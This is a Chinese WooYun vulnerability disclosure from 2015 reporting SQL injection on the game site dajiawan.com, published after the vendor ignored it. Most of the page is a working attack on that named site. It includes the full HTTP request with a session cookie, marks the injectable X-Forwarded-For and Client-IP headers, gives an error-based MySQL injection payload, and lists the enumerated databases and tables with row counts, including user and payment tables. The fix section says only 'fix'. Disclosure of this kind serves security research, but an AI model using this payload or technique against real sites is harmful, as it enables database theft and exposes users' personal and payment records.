当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127198

漏洞标题:大家玩主站SQL注射全站数据库泄露

相关厂商:大家玩

漏洞作者: 路人甲

提交时间:2015-07-16 16:22

修复时间:2015-08-30 16:24

公开时间:2015-08-30 16:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

GET /play_134_2/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
X-Forwarded-For: *
X-Requested-With: XMLHttpRequest
Referer: http://www.dajiawan.com/
Cookie: User_2012_LoginID=ZGp3MDcxNjAyMzcxMzcyOThjNmJjZDQ2N2U1ODNhN2E2ZDRiYjZiY2YxZjI1YTFhOGE1YTE1; PHPSESSID=5nv1mi326qqig2dnbgdd8nn3k0
Host: www.dajiawan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
还有Client-IP

漏洞证明:

---
Parameter: X-Forwarded-For #1* ((custom) HEADER)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: ' AND (SELECT 6860 FROM(SELECT COUNT(*),CONCAT(0x7162706271,(SELECT (ELT(6860=6860,1))),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zoiu'='Zoiu
---
web application technology: PHP 5.4.22, Nginx
back-end DBMS: MySQL 5.0
current user: '[email protected]'
current user is DBA: False
available databases [6]:
[*] db_bbs_dajiawan
[*] db_dajiawan
[*] db_discuz
[*] db_ucenter
[*] db_uchome
[*] information_schema
Database: db_dajiawan
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| db_user_online_hour | 9550342 |
| db_user_login | 3378403 |
| db_users | 658680 |
| db_user_play | 580812 |
| db_user | 494086 |
| db_gift | 417071 |
| db_server_tongji | 271048 |
| db_users_copy2 | 251752 |
| db_users_copy1 | 251738 |
| db_users_copy | 222331 |
| db_user_play_copy | 136088 |
| db_lianmeng_tuiguan | 126504 |
| db_lianmeng_tuiguan_bak | 92689 |
| db_gift_log | 74013 |
| db_nopay_log | 26174 |
| db_pay_xiaofei | 23721 |
| db_fangchenmi | 18740 |
| db_pay_xiaofei_copy2 | 18717 |
| db_pay_xiaofei_copy20140123 | 18717 |
| db_pay_xiaofei_copy1 | 18406 |
| db_pay_chongzhi | 16651 |
| db_haibao | 11276 |
| db_pay_chongzhi_test | 10807 |
| db_news | 9420 |
| db_cpl | 8652 |
| db_90wan_user | 8105 |
| db_90wan_userbak | 8101 |
| db_user_bind | 7852 |
| db_pay_log_apply | 6283 |
| db_pay_xiaofei_copy | 4597 |
| db_yiwo | 4310 |
| db_pay_yongjin | 3851 |
| db_kefu_chat | 3765 |
| db_sfz_bianma | 3466 |
| tbl_location | 3286 |
| db_webgame_tongji | 3250 |
| db_lianmeng_pay | 2444 |
| db_kaifu_post | 2299 |
| db_zuxiangyou | 2022 |
| db_job_joiner | 1632 |
| db_quba | 1170 |
| db_kefu_toupiao_time | 1103 |
| db_kefu_bind_time | 1054 |
| db_cpm | 992 |
| db_pay_status_log | 963 |
| db_fmt | 962 |
| db_platform | 889 |
| db_pay_log | 852 |
| db_pay_diyongjuan | 850 |
| db_pay_coin | 786 |
| db_xiaofie_check | 735 |
| db_pay_yongjin_copy | 710 |
| db_tg_binduser | 663 |
| db_gift_shouchong | 609 |
| db_active_get | 531 |
| db_server | 518 |
| db_cplbak | 456 |
| db_huiyuan_genjin | 355 |
| db_ad_list | 301 |
| db_mobile_ckcode | 300 |
| db_lianmeng | 266 |
| db_active | 240 |
| db_link | 220 |
| db_kaifu_site | 215 |
| db_gift_cart | 195 |
| db_user_channel | 195 |
| db_pay_duizhang | 163 |
| db_haibao_kaifu_jkz | 157 |
| db_haibao_kaifu_jzw | 152 |
| db_haibao_kaifu_tqyb | 145 |
| db_kefu_delete | 143 |
| db_haibao_kaifu | 140 |
| db_active_time | 123 |
| tbl_modules | 113 |
| tbl_modules_copy | 113 |
| db_meiti | 84 |
| tbl_users | 82 |
| db_ad_space | 78 |
| db_server_weihu | 78 |
| tbl_users_copyfrom_20140923 | 75 |
| db_card_list | 71 |
| db_kaifu_server | 52 |
| db_cpm_from_tongji | 47 |
| db_webgame | 46 |
| db_haibao_game | 43 |
| db_webgame_extends | 42 |
| tbl_users_copy | 42 |
| db_cpm_from | 36 |
| db_kefu_xinqing | 35 |
| db_child_xflog | 29 |
| db_pay_bank | 29 |
| db_webgame_guanwang | 28 |
| db_card_sort | 23 |
| db_game_left | 21 |
| db_active_qiangjinbi | 20 |
| db_news_sort | 19 |
| db_game_left_sort | 18 |
| db_user_online | 17 |
| db_pay_sort | 16 |
| db_vip | 12 |
| db_link_gift | 11 |
| tbl_usergroups | 10 |
| tbl_usergroups_copy | 10 |
| db_gameleft_url | 8 |
| db_kefu | 7 |
| db_user_yongjin_log | 7 |
| db_webgame_sort | 7 |
| db_ad_sort | 6 |
| db_child_site | 6 |
| db_pay_tg | 6 |
| db_zhuti | 6 |
| db_pay_sort_copy | 5 |
| db_user_application | 5 |
| db_webgame_push | 5 |
| db_webgame_type | 5 |
| db_active_fun | 4 |
| db_sucai | 4 |
| db_job | 3 |
| db_news_del | 3 |
| db_server_weekweihu | 2 |
| db_active_fun_filter | 1 |
| db_chazidian | 1 |
| db_game_dianping | 1 |
| db_jiankangzu | 1 |
| db_jiazhaowang | 1 |
| db_job_fun | 1 |
+-----------------------------+---------+
Database: db_bbs_dajiawan
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| pre_ucenter_members | 328800 |
| pre_ucenter_memberfields | 90434 |
| pre_common_remote_port | 48841 |
| pre_home_notification | 45702 |
| pre_common_district | 45051 |
| pre_common_credit_rule_log | 29086 |
| pre_common_member_count | 26070 |
| pre_common_member_field_forum | 26070 |
| pre_common_member_field_home | 26070 |
| pre_common_member_profile | 26070 |
| pre_common_member_status | 26070 |
| pre_common_member | 26059 |
| pre_common_member_newprompt | 25930 |
| pre_forum_post | 24071 |
| pre_forum_thread | 20947 |
| pre_forum_statlog | 13169 |
| pre_common_onlinetime | 10935 |
| pre_forum_threadpartake | 10136 |
| pre_common_member_action_log | 7688 |
| pre_forum_thread_moderate | 6284 |
| pre_forum_newthread | 5845 |
| pre_forum_medallog | 4650 |
| pre_forum_threadmod | 4435 |
| pre_forum_filter_post | 2974 |
| pre_forum_post_moderate | 2765 |
| pre_common_member_medal | 2650 |
| pre_forum_attachment | 2397 |
| pre_forum_sofa | 1659 |
| pre_forum_threadimage | 804 |
| pre_forum_post_tableid | 714 |
| pre_forum_threaddisablepos | 527 |
| pre_forum_rsscache | 465 |
| pre_common_credit_rule_log_field | 437 |
| pre_common_setting | 428 |
| pre_home_visitor | 395 |
| pre_forum_attachment_0 | 294 |
| pre_forum_attachment_4 | 290 |
| pre_forum_attachment_2 | 275 |
| pre_forum_attachment_8 | 258 |
| pre_forum_attachment_9 | 240 |
| pre_forum_attachment_1 | 227 |
| pre_forum_attachment_7 | 215 |
| pre_forum_attachment_3 | 206 |
| pre_forum_attachment_6 | 191 |
| pre_forum_attachment_5 | 190 |
| pre_common_regip | 151 |
| pre_forum_threadclass | 148 |
| pre_common_block_style | 103 |
| pre_common_syscache | 101 |
| pre_common_stylevar | 90 |
| pre_common_smiley | 85 |
| pre_common_member_crime | 75 |
| pre_common_banned | 74 |
| pre_common_admincp_perm | 67 |
| pre_forum_moderator | 63 |
| pre_forum_forumfield | 58 |
| pre_common_nav | 57 |
| pre_common_statuser | 57 |
| pre_forum_forum | 57 |
| pre_common_member_profile_setting | 51 |
| pre_ucenter_failedlogins | 51 |
| pre_common_tagitem | 44 |
| pre_common_tag | 36 |
| pre_common_credit_rule | 31 |
| pre_common_word | 28 |
| pre_ucenter_settings | 26 |
| pre_common_session | 21 |
| pre_common_cron | 20 |
| pre_common_cache | 17 |
| pre_common_usergroup | 17 |
| pre_common_usergroup_field | 17 |
| pre_ucenter_pm_indexes | 16 |
| pre_home_click | 15 |
| pre_ucenter_pm_members | 13 |
| pre_home_favorite | 12 |
| pre_forum_attachment_unused | 11 |
| pre_forum_medal | 10 |
| pre_forum_memberrecommend | 10 |
| pre_common_plugin | 9 |
| pre_ucenter_notelist | 9 |
| pre_home_friend_request | 8 |
| pre_common_failedlogin | 7 |
| pre_forum_groupfield | 7 |
| pre_ucenter_pm_lists | 7 |
| pre_forum_typeoption | 6 |
| pre_common_admincp_group | 5 |
| pre_home_poke | 5 |
| pre_home_pokearchive | 5 |
| pre_ucenter_pm_messages_5 | 5 |
| pre_common_admincp_cmenu | 4 |
| pre_common_admingroup | 4 |
| pre_common_stat | 4 |
| pre_forum_bbcode | 4 |
| pre_forum_modwork | 4 |
| pre_forum_onlinelist | 4 |
| pre_home_friend | 4 |
| pre_ucenter_newpm | 4 |
| pre_ucenter_pm_messages_1 | 4 |
| pre_common_friendlink | 3 |
| pre_forum_forumrecommend | 3 |
| pre_forum_grouplevel | 3 |
| pre_forum_hotreply_member | 3 |
| pre_forum_hotreply_number | 3 |
| pre_forum_imagetype | 3 |
| pre_home_follow | 3 |
| pre_common_block | 2 |
| pre_common_diy_data | 2 |
| pre_common_style | 2 |
| pre_common_template | 2 |
| pre_common_template_block | 2 |
| pre_common_word_type | 2 |
| pre_forum_threadcalendar | 2 |
| pre_forum_threadhot | 2 |
| pre_home_friendlog | 2 |
| pre_mobile_setting | 2 |
| pre_ucenter_applications | 2 |
| pre_ucenter_pm_messages_6 | 2 |
| pre_ucenter_pm_messages_7 | 2 |
| pre_common_admincp_session | 1 |
| pre_forum_attachtype | 1 |
| pre_forum_groupuser | 1 |
| pre_forum_promotion | 1 |
| pre_forum_threadprofile | 1 |
| pre_home_comment | 1 |
| pre_ucenter_admins | 1 |
| pre_ucenter_pm_messages_2 | 1 |
| pre_ucenter_pm_messages_3 | 1 |
| pre_ucenter_pm_messages_4 | 1 |
+-----------------------------------+---------+
Database: db_discuz
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| pre_common_district | 45051 |
| pre_forum_statlog | 28627 |
| pre_forum_post | 21562 |
| pre_forum_threadpartake | 17584 |
| pre_common_credit_rule_log | 12664 |
| pre_home_notification | 12442 |
| pre_forum_thread | 11908 |
| pre_common_member | 9080 |
| pre_common_member_count | 9080 |
| pre_common_member_field_forum | 9080 |
| pre_common_member_field_home | 9080 |
| pre_common_member_profile | 9080 |
| pre_common_member_status | 9080 |
| pre_common_onlinetime | 6899 |
| pre_forum_threadmod | 5406 |
| pre_forum_thread_moderate | 3510 |
| pre_common_member_crime | 1982 |
| pre_forum_rsscache | 1158 |
| pre_common_member_validate | 921 |
| pre_forum_attachment | 784 |
| pre_forum_post_tableid | 773 |
| pre_forum_post_moderate | 675 |
| pre_common_member_action_log | 504 |
| pre_common_stat | 457 |
| pre_common_setting | 400 |
| pre_connect_memberbindlog | 327 |
| pre_common_member_connect | 318 |
| pre_forum_modwork | 317 |
| pre_common_stylevar | 315 |
| pre_common_syscache | 209 |
| pre_common_statuser | 169 |
| pre_common_connect_guest | 154 |
| pre_forum_attachment_5 | 153 |
| pre_forum_forumfield | 132 |
| pre_forum_forum | 131 |
| pre_connect_feedlog | 122 |
| pre_forum_attachment_2 | 106 |
| pre_common_block_style | 103 |
Database: db_uchome
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| uchome_tagblog | 315369 |
| uchome_blog | 161012 |
| uchome_blogfield | 161012 |
| uchome_creditlog | 46679 |
| uchome_member | 17044 |
| uchome_space | 17044 |
| uchome_spacefield | 17044 |
| uchome_mailqueue | 12778 |
| uchome_mailcron | 12760 |
| uchome_tag | 6460 |
| uchome_feed | 3157 |
| uchome_statuser | 1957 |
| uchome_friend | 1839 |
| uchome_spaceinfo | 1442 |
| uchome_stat | 173 |
| uchome_config | 100 |

修复方案:

fix

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝